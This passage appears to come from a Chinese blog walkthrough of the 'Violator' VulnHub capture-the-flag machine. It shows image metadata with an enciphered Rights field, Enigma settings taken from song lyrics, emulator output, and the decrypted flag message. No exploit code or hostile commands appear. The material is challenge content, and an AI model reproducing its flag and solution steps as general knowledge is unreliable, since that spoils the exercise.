    Rights                          : UKSNRSPYLEWHKOKZARVKDEINRLIBWIUCFQRQKAQQGQLTIUCYMFENULUVFOYQDKPHSUJHFUJSAYJDFGDFRYWKLSVNJNVDVSBIBFNIFASOPFDVEYEBQYCOGULLLVQPUWISDBNLNQIJUEZACAKTPPSBBLWRHKZBJMSKLJOACGJMFVXZUEKBVWNKWEKVKDMUYFLZEOXCIXIUHJOVSZXFLOZFQTNSKXVWUHJLRAEERYTDPVNZPGUIMXZMESMAMBDVKFZSDEIQXYLJNKTBDSRYLDPPOIVUMZDFZPEWPPVHGPFBEERMDNHFIWLSHZYKOZVZYNEXGPROHLMRHFEIVIIATOAOJAOVYFVBVIYBGUZXXWFKGJCYEWNQFTPAGLNLHVCRDLFHSXHVMCERQTZOOZARBEBWCBCIKUOFQIGZPCMWRHJEMUSGYBGWXJENRZHZICACWOBJMI
    Creator                         : Dave Gaham
    Subject                         : created by user dg
    Title                           : Violator
    Description                     : Violator
    Warning                         : [minor] Fixed incorrect URI for xmlns:MicrosoftPhoto
    Date Acquired                   : 1941:05:09 10:30:18.134
    Last Keyword XMP                : created by user dg
    Image Width                     : 1450
    Image Height                    : 1450
    Encoding Process                : Baseline DCT, Huffman coding
    Bits Per Sample                 : 8
    Color Components                : 3
    Y Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)
    Image Size                      : 1450x1450
    Megapixels                      : 2.1
    Create Date                     : 1990:03:19 22:13:30.04
    Date/Time Original              : 1990:03:19 22:13:30.04
    ➜  DOWNLOAD 
    
    
    • 版权那两个地方非常突出了,但是又不是base64,然后在mg目录发现的歌词和一个C程序没用上。

    Lyrics:

    • Use Wermacht with 3 rotors
    • Reflector to B
      Initial: A B C
      Alphabet Ring: C B A
      Plug Board A-B, C-D
    • 看来那个C程序是解这串字的,但是他卡住了。
    ➜  minarke-1.21 ./minarke 
    
    
    Minarke, an Enigma M4 emulator
    by John Gilbert
    
    Emulates the Kriegsmarine M4 Enigma encryption machine
    
    	Initial Setup Notes
    Rotors: Reflector (B/C), Thin Rotor (B/G), 3 Rotors (1-8, can't reuse them) 
    Use BB### or CG### with A### settings to read/create Wehrmacht three rotor traffic 
    Ring and position settings: A-Z for each of the 4 rotors
    Reflector setting is always fixed at A.
    Plugboard settings: A-Z,A-Z pairs, also won't allow reuse
    Hit return to end input, 11 pairs recomended for maximum security.
    Hit ESC at any time to quit.
    
    	Special Keys (during input mode)
    1: rewind one setting
    2: reset position settings
    3: new position settings
    4: new setup
    9: toggle debug
    0: show position settings
    ?: show help
    
    see http://en.wikipedia.org/wiki/Enigma_machine
    also http://www.bytereef.org/m4_project.html
    
    
    Rotors: 
    
    • Google找在线的解密工具,解了也看不懂,没有空格分开翻译不了,反正flag拿到了。
    ONEFINALCHALLENGEFORYOUBGHXCONGRATULATIONSFORTHEFOURTHTIMEONSNARFINGTHEFLAGONVIOLATORILLPRESUMEBYNOWYOULLKNOWWHATIWASLISTENINGTOWHENCREATINGTHISCTFIHAVEINCLUDEDTHINGSWHICHWEREDELIBERATLYAVOIDINGTHEOBVIOUSROUTEINTOKEEPYOUONYOURTOESANOTHERTHOUGHTTOPONDERISTHATBYABUSINGPERMISSIONSYOUAREALSOBYDEFINITIONAVIOLATORSHOUTOUTSAGAINTOVULNHUBFORHOSTINGAGREATLEARNINGTOOLASPECIALTHANKSGOESTOBENRANDGKNSBFORTESTINGANDTOGTMLKFORTHEOFFERTOHOSTTHECTFAGAINKNIGHTMARE
    
  • 相关阅读:
    ruby -- 修改rubymine的字体大小
    ruby -- 基础学习(二) 外键配置实现级联删除
    ruby -- 基础学习(一)项目文件夹说明
    ruby -- 问题解决(二)rails4.0create引起的ActiveModel::ForbiddenAttributesError错误
    ruby -- 问题解决(一)无法连接mysql数据库
    enumerate用法
    python文件调用
    第二天----列表、深浅拷贝、元组、字符串、算数运算、字典、while
    P1005 矩阵取数游戏(动态规划+高精度)
    P1242 新汉诺塔(搜索+模拟退火)
  • 原文地址:https://www.cnblogs.com/Kali-Team/p/12211019.html
Copyright © 2020-2023  润新知